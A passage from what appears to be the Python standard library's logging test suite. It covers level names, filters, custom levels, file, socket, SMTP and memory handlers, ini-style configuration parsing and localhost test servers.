self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
"""
self.close()
support.join_thread(self._thread)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self):
"""
Tell the server thread to stop, and wait for it to do so.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever
TIMEOUT = support.LONG_TIMEOUT
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
